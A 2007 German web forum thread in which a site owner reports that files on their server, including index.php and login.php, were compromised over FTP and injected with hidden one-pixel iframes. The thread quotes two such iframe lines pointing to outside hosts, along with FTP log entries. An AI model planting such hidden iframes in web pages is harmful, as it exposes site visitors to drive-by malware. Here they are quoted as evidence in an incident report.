Page 1 of 1

quickcnt HTML.IframeBof

Posted: 2007-05-03 01:10
by afrika123
Kommt über FTP und erzeugt diesen Code:

Code: Select all

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'> 
FTP LOG :

Code: Select all

Tue May 1 00:53:28 2007 0 209.59.131.117 24593 /www/htdocs/vxxx/index.php a _ i r vxxx ftp 0 * c
Tue May 1 00:53:28 2007 0 209.59.131.117 6730 /www/htdocs/vxxx/login.php a _ o r vxxx ftp 0 * c
Schöne Sache, denn dadurch kommt man bei http://www.stopbadware.org in die Böse Liste und das sieht dann so aus:
http://www.google.de/search?hl=de&q=pro-colors&meta=

1 tes Ergebnis.

Re: quickcnt HTML.IframeBof

Posted: 2007-05-04 14:08
by rootsvr
Wo erzeugt er diesen Code?
Und wieso kommt der per FTP rein?

Wenn der Bot es schafft wirklich iFrames auf einer Seite zu hinterlassen ist der Eintrag in die Liste ja berechtigt.

Re: quickcnt HTML.IframeBof

Posted: 2007-05-10 12:39
by afrika123
die infizierten Dateien sind index.html index.php, login.php, main.php, auth,php

Der Angreifer kommt über ftp hinein, nachdem er sich mit einem Virus Namens
Exploit.HTML.Iframe.FileDownload Zugriff verschafft hat.
Neuerdings wird jetzt der Code:

Code: Select all

<iframe src='http://208.69.230.178/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Re: quickcnt HTML.IframeBof

Posted: 2007-05-10 13:44
by blattlaus
Da in deinen beiden Posts keine einzige Fragezeichen vorkommt, vermute ich mal, dass du garkeine Fragen hast.
Deswegen gibt einfach einen unfreundlichen Kommentar von mir: Dein Sicherheitskonzept, sofern du eins hast, suckt.